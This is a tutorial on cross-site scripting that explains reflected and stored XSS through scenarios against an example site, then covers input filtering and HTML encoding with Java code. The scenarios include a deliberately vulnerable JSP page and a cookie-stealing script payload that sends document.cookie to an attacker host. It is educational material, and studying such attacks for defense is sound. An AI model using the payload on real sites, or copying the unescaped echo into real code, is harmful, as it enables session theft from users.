XSS is short for Cross Site Scripting (it is abbreviated XSS rather than CSS to avoid confusion with Cascading Style Sheets). It is a common vulnerability in web applications. XSS is a passive attack aimed at the client, the victim's browser, rather than at the server, so its dangers are easy to underestimate. The principle is that the attacker injects malicious HTML or script into a website with an XSS vulnerability; when other users browse the affected page, that code is executed automatically in their browsers, in the security context of the site. Typical consequences are theft of the user's cookies, defacement of the page structure, and redirection to other websites.
XSS attacks
XSS attacks resemble SQL injection attacks: before attacking, we first find a website with an XSS vulnerability. This article divides XSS vulnerabilities into two types: DOM Based XSS, the non-persistent kind delivered through a crafted link, and Stored XSS. (The scenario under DOM Based XSS below is what is usually called reflected XSS, since the server echoes the parameter into the page; DOM-based XSS proper is the variant in which client-side script itself inserts the parameter into the DOM. The delivery and impact are the same.) Theoretically, any input that the site renders back without processing is an XSS vulnerability. How much harm it does depends on the power of the attack code, and the attack code is not limited to <script> tags: an event handler attribute such as onerror on an <img> tag, or a javascript: URL, works as well.
DOM Based XSS
DOM-Based XSS is an attack based on the DOM structure of the web page: the malicious input travels in the request (usually in the URL) and ends up in the page the victim's browser renders. Its characteristic is that few people are affected, only those who can be tricked into opening the crafted link.
Scenario 1:
When I log on to a.com, I find that some of the page content is displayed directly from a content parameter in the URL. I guess the page looks something like this (JSP here; the same pattern appears in any server-side language):
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<body>
<%-- The body echoes the content parameter straight into the page. This line is reconstructed from the description above; the original snippet stopped at the DOCTYPE. --%>
<%= request.getParameter("content") %>
</body>
</html>
First, a test against myself: if I open http://www.a.com/?content=<script>alert("xss")</script> in my browser, the page echoes my parameter, the browser executes the script while rendering the page, and an alert box with the word xss pops up. That only attacks me. How do I attack someone else and gain from it?

I know Tom is also registered on the site and I know his e-mail address (any channel that reaches him will do). I craft a hyperlink for him:

http://www.a.com/?content=<script>window.open("http://www.b.com/?param=" + document.cookie)</script>

(In a real link the parameter value is URL-encoded; it is shown decoded here for readability. The scheme on b.com matters: a bare www.b.com would be resolved as a relative path on a.com.) b.com is a site I control. When Tom clicks the link while logged in to a.com, a.com reflects the script into the page, Tom's browser runs it, opens b.com, and appends Tom's a.com cookies to the request. My server records them, and I now hold Tom's cookie, which typically carries his session identifier (or, on badly designed sites, saved credentials), so I can act as Tom. The attack succeeded, and the only victim in this process is Tom himself. (A cookie flagged HttpOnly is not exposed through document.cookie, which blunts this particular payload, though not XSS in general.)
Stored XSS
Stored XSS is the persistent type: the attack code is saved on the server or in the database, so everyone who views the affected content becomes a victim.
Scenario 2:
Suppose a.com lets users post articles. I log in to a.com and publish an article whose body contains the malicious code <script>window.open("http://www.b.com/?param=" + document.cookie)</script>, and the site saves the article as submitted. Later Tom and Jack read my article. As each of them views it, the script runs in his browser and his a.com cookies are sent to my server. The attack succeeded, and this time there are multiple victims: everyone who reads the article.
The Stored XSS vulnerability is therefore more harmful and wider in scope: one injection hits every reader, with no need to lure each victim individually.
XSS defense
Spear and shield: as long as there are no holes in our code, attackers have nowhere to start, so we must leave them no crack to get in through. The following XSS defenses are available.
Strict input filtering
Never trust user input. User input must be processed before it is used: accept only values that match the expected format (a whitelist of what is valid) and reject everything else. Filtering alone is fragile, though, because attackers use alternate encodings, event handler attributes and other vectors the filter did not anticipate, so it should be combined with the output encoding described next.
HTML encode
Where user data cannot be strictly filtered (free text, for instance), we must encode it when it is written into the page, converting the characters that have a special meaning in HTML:

    Character                               Encoded as
    less-than (<)                           &lt;
    greater-than (>)                        &gt;
    ampersand (&)                           &amp;
    double quote (")                        &quot;
    space ( )                               &nbsp;
    any character with code >= 0x80         &#<number>;  where <number> is the character's decimal code point

For example, if the user inputs <script>window.location.href="http://www.baidu.com";</script>, the encoded form is &lt;script&gt;window.location.href=&quot;http://www.baidu.com&quot;;&lt;/script&gt;. When the page is displayed, the browser renders these entities as literal text rather than as executable code. Encoding at output time is preferable to encoding once at storage time, because the same stored value may later be written into contexts (attribute values, JavaScript, URLs) that need different escaping rules.
Two implementations are given below. The first uses Apache commons-lang.jar:

    StringEscapeUtils.escapeHtml(str); // characters with no named entity (Chinese text, for example) become numeric references such as &#20013;; spaces are not converted

The second converts only the characters from the table above by hand:

    private static String htmlEncode(char c) {
        switch (c) {
            case '&': return "&amp;";
            case '<': return "&lt;";
            case '>': return "&gt;";
            case '"': return "&quot;";
            case ' ': return "&nbsp;";
            default:  return c + "";
        }
    }

    /** Convert the input String 'str' to its HTML-encoded form. */
    public static String htmlEncode(String str) {
        if (str == null || str.trim().equals("")) return str;
        StringBuilder encodeStrBuilder = new StringBuilder();
        for (int i = 0, len = str.length(); i < len; i++) {
            encodeStrBuilder.append(htmlEncode(str.charAt(i)));
        }
        return encodeStrBuilder.toString();
    }

    // Note: the single quote (') is not converted, so this output is only safe in HTML text
    // or inside double-quoted attribute values, never inside a single-quoted attribute or a
    // <script> block.